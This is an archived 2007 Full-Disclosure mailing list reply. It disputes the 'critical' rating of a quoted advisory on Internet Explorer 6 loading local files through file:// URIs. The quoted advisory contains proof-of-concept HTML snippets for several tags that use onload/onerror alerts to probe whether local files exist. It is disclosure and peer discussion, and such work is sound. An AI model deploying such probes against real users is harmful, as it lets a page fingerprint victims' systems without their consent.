lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1348496411.20070220152910@SECURITY.NNOV.RU>
Date: Tue, 20 Feb 2007 15:29:10 +0300
From: 3APA3A <3APA3A@...URITY.NNOV.RU>
To: "Rajesh Sethumadhavan" <rajesh.sethumadhavan@...oo.com>
Cc: vuln@...urity.nnov.ru, full-disclosure@...ts.grok.org.uk
Subject: Re: Microsoft Internet Explorer Local File
	Accesses Vulnerability

Dear Rajesh Sethumadhavan,

As  Michal  Zalewski  pointed,  there  is no "critical" security impact,
because  you  (as attacker) can force browser to open files (it's common
thing,  you can do it in any browser), but you can not access content of
these files. The only security impact in few cases is checking existence
of  image/sound files. It's possible to discover system drive or if some
specific software is installed by the presence of the files. This impact
is definitely not critical and it was discussed.

--Tuesday, February 20, 2007, 1:21:25 AM, you wrote to vuln@...urity.nnov.ru:

RS> *Microsoft Internet Explorer Local File Accesses Vulnerability*

RS> #####################################################################
RS> XDisclose Advisory        : XD100099
RS> Vulnerability Discovered : February 10th 07
RS> Advisory Released         : February 20th 07
RS> Credit                           : Rajesh Sethumadhavan

RS> Class                           : Local File Accesses
RS> Severity                        : Critical
RS> Solution Status             : Unpatched
RS> Vendor                         : Microsoft Corporation
RS> Affected applications     : Microsoft Internet Explorer
RS> Affected version            : Microsoft Internet Explorer 6 confirmed
RS>                                     (Other versions may be also affected)
RS> Affected Platform          : Windows XP Professional SP0,SP1,SP2
RS>                                      Windows Home Edition SP0,SP1,SP2
RS>                                      Windows 2003

RS> #####################################################################


RS> *Overview:*
RS> Microsoft Internet Explorer is a default browser bundled with all
RS> versions of Microsoft Windows operating system.

RS> *Description:
RS> *A vulnerability has been identified in Microsoft Internet Explorer,
RS> (default installation) in windows XP service pack 2 which could be
RS> exploited by malicious users to obtain victims local files. This flaw
RS> is due to an error in the way Microsoft Internet explorer handles
RS> different html tags. Which could be exploited by a malicious remote
RS> user to obtain sensitive local files from the victim's computer.
RS> *Vulnerability Insight :*
RS> Microsoft Windows explorer is not handling various html tags like "img"
RS> "script" "embed" "object" "param" "style" "bgsound" "body" "input"
RS> (Other tags may be also vulnerable). By using the file protocol along
RS> with above tags it is possible to accesses victims local files.

RS> *a)* Embed Tag Local file Accesses:
RS> ---------------------------------------------------------------------
RS> <EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
RS> ---------------------------------------------------------------------

RS> *b) *Object & Param Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <object type="audio/x-mid" data="file:///C:/test.mid" width="200"
RS> height="20">
RS>   <param name="src" value="file:///C:/test.mid">
RS>   <param name="autoStart" value="true">
RS>   <param name="autoStart" value="0">
RS> </object>
RS> ---------------------------------------------------------------------

RS> *c)* Body Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <body background="file:///C:/test.gif" onload="alert('loading body
RS> bgrd success')" onerror="alert('loading body bgrd error')">
RS> ---------------------------------------------------------------------

RS> *d)* Style Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <STYLE type="text/css">BODY{background:url("file:///C:/test.gif")}
RS> </STYLE>
RS> ---------------------------------------------------------------------

RS> *e)* Bgsound Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart=
RS> "true"/>
RS> ---------------------------------------------------------------------

RS> *f)* Input Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <form>
RS>   <input type="image" src="file:///C:/test.gif" onload="alert('loading
RS>   input success')" onerror="alert('loading input error')">
RS> </form>
RS> ---------------------------------------------------------------------

RS> *g)* Image Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <img src="file:///C:/test.jpg" onload="alert('loading image success')"
RS> onerror="alert('loading image error')">
RS> ---------------------------------------------------------------------

RS> *h)* Script Tag Local File Accesses:
RS> ---------------------------------------------------------------------
RS> <script src="file:///C:/test.js"></script>
RS> ---------------------------------------------------------------------


RS> *Exploitation method:*
RS> - Creates a web page or an HTML Mail with the vulnerable code
RS> - When the victim opens the mail or visit the vulnerable site it is
RS>   possible to accesses his local files.

RS> *Demonstration:*
RS> Note: Demonstration will try to accesses few default images and wave
RS> files

RS> - Visit the POC
RS> - If vulnerable internet explorer is used it will show your local
RS>   sample images and give a proper alert.

RS> *Solution:*
RS> No solution

RS> *Screenshot:
RS> *http://www.xdisclose.com/images/xdiscloselocalie.jpg

RS> *Proof Of Concept:*
RS> http://www.xdisclose.com/poc/xdiscloselocalie.html

RS> *Impact:*
RS> A Remote user can get accesses to victims local system files.

RS> Scope of impact is limited to system level.

RS> *Original Advisory:
RS> *http://www.xdisclose.com/XD100099.txt

RS> *Credits:*
RS> Rajesh Sethumadhavan has been credited with the discovery of this
RS> vulnerability

RS> *Disclaimer:*
RS> This entire document is strictly for educational, testing and
RS> demonstrating purpose only. Modification use and/or publishing this
RS> information is entirely on your own risk. The exploit code is to be
RS> used on your testing environment only. I am not liable for any direct
RS> or indirect damages caused as a result of using the information or
RS> demonstrations provided in any part of this advisory.


RS> Thanks
RS> Regards
RS> Rajesh Sethumadhavan


-- 
~/ZARAZA http://securityvulns.com/
Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü.  (Òâåí)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ